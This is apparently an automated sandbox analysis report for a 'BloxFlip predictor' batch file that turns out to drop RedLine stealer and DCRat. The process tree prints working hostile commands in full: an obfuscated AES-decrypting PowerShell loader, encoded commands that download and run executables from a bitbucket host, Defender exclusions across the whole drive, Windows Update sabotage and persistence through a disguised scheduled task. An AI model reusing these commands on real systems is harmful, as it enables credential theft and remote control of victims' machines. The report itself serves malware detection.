Analysis
-
max time kernel
53s -
max time network
70s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
-
submitted
03-09-2022 07:51
General
-
Target
BLOXFLIP-Predictor-main/BloxPredictor.bat
-
Size
24KB
-
MD5
2ce736935920d83e5d55570739ca8c17
-
SHA1
9aab2f25403a0fe6921c152f61ed3d2ceacfad49
-
SHA256
001c531b29372d4f6c7697ac00a575773470d23c8681d1d5930aa1e4cd860b76
-
SHA512
c58589dbcf5a23ca2cd9284733db20659b81850a33bc6eddf6379507fb7307a569019373168665fee93c02d42bdd3ee3c42377db7e16405e32f6e7554d8a3de0
-
SSDEEP
768:lsh2CrG0Qz6Ee7Z+x4a7eE8xRrQAh+WVqMJzO:BCrGrGE7x4a7eDfrQAh+SJzO
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
Dv
C2
195.3.223.79:65252
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies security service 2 TTPs 5 IoCs
-
Process spawned unexpected child process 39 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
-
DCRat payload 20 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 20 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 28 IoCs
-
Drops file in Windows directory 11 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 39 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\BLOXFLIP-Predictor-main\BloxPredictor.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Users\Admin\AppData\Local\Temp\BLOXFLIP-Predictor-main\BloxPredictor.bat.exe"BloxPredictor.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $utPpZ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\BLOXFLIP-Predictor-main\BloxPredictor.bat').Split([Environment]::NewLine);foreach ($rwqec in $utPpZ) { if ($rwqec.StartsWith(':: ')) { $Wboiv = $rwqec.Substring(3); break; }; };$gxVLe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Wboiv);$GyhDr = New-Object System.Security.Cryptography.AesManaged;$GyhDr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GyhDr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GyhDr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YLrTLbeRJCsrE1rODFNA5EoKHyT/E5XO8ub+oldlmT0=');$GyhDr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WKvnZ2dZQdF2NCy0/rivZA==');$bYWQg = $GyhDr.CreateDecryptor();$gxVLe = $bYWQg.TransformFinalBlock($gxVLe, 0, $gxVLe.Length);$bYWQg.Dispose();$GyhDr.Dispose();$xJivi = New-Object System.IO.MemoryStream(, $gxVLe);$UhQFt = New-Object System.IO.MemoryStream;$RZDSG = New-Object System.IO.Compression.GZipStream($xJivi, [IO.Compression.CompressionMode]::Decompress);$RZDSG.CopyTo($UhQFt);$RZDSG.Dispose();$xJivi.Dispose();$UhQFt.Dispose();$gxVLe = $UhQFt.ToArray();$lwtWe = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($gxVLe);$erSXK = $lwtWe.EntryPoint;$erSXK.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAaQBqACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHoAaQBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAbABpAGMAZQBuAGMAZQAhACAAQwBvAG4AdABhAGMAdAAgAG8AdwBuAGUAcgAgAG8AbgAgAFQAZQBsAGUAZwByAGEAbQA6ACAAQABNAGEAdgBlADEANABCAHIAdgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAaQB3AGsAIwA+ADsAIgA7ADwAIwB6AGEAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAZABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAeAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcABjACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AbAB1AGMAaQBmAGUAcgA1ADgAMQA4ADQALwBlAHcAagBuAGYAaQBvAHcAZQBuAGYAaQB3AGUAdwAvAHIAYQB3AC8AMwA5AGIAMgA2ADQANABlADUANAA3AGQAZQAwADkANQBiADgAYQBmADYAZQAxAGUAMgA1AGIANwBjAGQAOABjADAAZgAzADEANgA4AGIANgAvAGwAdQBjAGkAZgBlAHIALgBlAHgAZQAnACwAIAA8ACMAbQBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGsAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBwAHIAbwB0AGUAYwB0AGkAbwBuADEALgBlAHgAZQAnACkAKQA8ACMAcwB6AGsAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIANQA4ADEAOAA0AC8AZQB3AGoAbgBmAGkAbwB3AGUAbgBmAGkAdwBlAHcALwByAGEAdwAvADMAOQBiADIANgA0ADQAZQA1ADQANwBkAGUAMAA5ADUAYgA4AGEAZgA2AGUAMQBlADIANQBiADcAYwBkADgAYwAwAGYAMwAxADYAOABiADYALwBsAHUAYwBpAG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGIAcgBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwBnAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAagB0AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAGMAZQBDAGgAZQBjAGsAZQByAC4AZQB4AGUAJwApACkAPAAjAGoAcQBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADUAOAAxADgANAAvAGUAdwBqAG4AZgBpAG8AdwBlAG4AZgBpAHcAZQB3AC8AcgBhAHcALwAzADkAYgAyADYANAA0AGUANQA0ADcAZABlADAAOQA1AGIAOABhAGYANgBlADEAZQAyADUAYgA3AGMAZAA4AGMAMABmADMAMQA2ADgAYgA2AC8AYgBsAG8AbwBkAGUAeQAuAGUAeABlACcALAAgADwAIwB4AGQAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGUAagBqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAcQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUATwB1AHQAcAB1AHQALgBlAHgAZQAnACkAKQA8ACMAZAB0AG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABrAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAZgBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHAAcgBvAHQAZQBjAHQAaQBvAG4AMQAuAGUAeABlACcAKQA8ACMAcgBoAHUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBjAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAdgBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcAKQA8ACMAcQBsAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAeQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUATwB1AHQAcAB1AHQALgBlAHgAZQAnACkAPAAjAHcAaQBiACMAPgA="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#zii#>[System.Windows.Forms.MessageBox]::Show('No licence! Contact owner on Telegram: @Mave14Brv','','OK','Error')<#iwk#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\protection1.exe"C:\Users\Admin\AppData\Roaming\protection1.exe"4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\containerServerWebMonitornet\qcbaWttH43WmPxKkpx5bHkWC.vbe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\containerServerWebMonitornet\SHgR50yPdqOmq945QS.bat" "6⤵
-
C:\containerServerWebMonitornet\ContainerServersvc.exe"C:\containerServerWebMonitornet\ContainerServersvc.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'8⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2424 -s 15968⤵
- Program crash
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerServerWebMonitornet/'8⤵
- Executes dropped EXE
-
C:\containerServerWebMonitornet\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\LicenceChecker.exe"C:\Users\Admin\AppData\Roaming\LicenceChecker.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYgBqAHEAZQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAegBnACMAPgAgAEAAKAAgADwAIwBvAHUAbgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAG8AdgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBxAGoAYgB2ACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeABzAGYAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIAYwBoAHIALgBlAHgAZQAiACcAKQAgADwAIwBqAHAAZwBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAbABkAHcAbgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHgAcwBjACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUARwBOAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwB4AHUAbgByACMAPgA7AA=="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineGNC"6⤵
-
C:\Users\Admin\AppData\Local\Temp\LicenceOutput.exe"C:\Users\Admin\AppData\Local\Temp\LicenceOutput.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\BLOXFLIP-Predictor-main\BloxPredictor.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\BLOXFLIP-Predictor-main\BloxPredictor.bat.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /c y /n /d y /t 14⤵
-
C:\Windows\system32\attrib.exeattrib -h -s "C:\Users\Admin\AppData\Local\Temp\BLOXFLIP-Predictor-main\BloxPredictor.bat.exe"4⤵
- Views/modifies file attributes
-
C:\Program Files\Google\Chrome\updaterchr.exe"C:\Program Files\Google\Chrome\updaterchr.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYgBqAHEAZQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAegBnACMAPgAgAEAAKAAgADwAIwBvAHUAbgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAG8AdgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBxAGoAYgB2ACMAPgA="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & 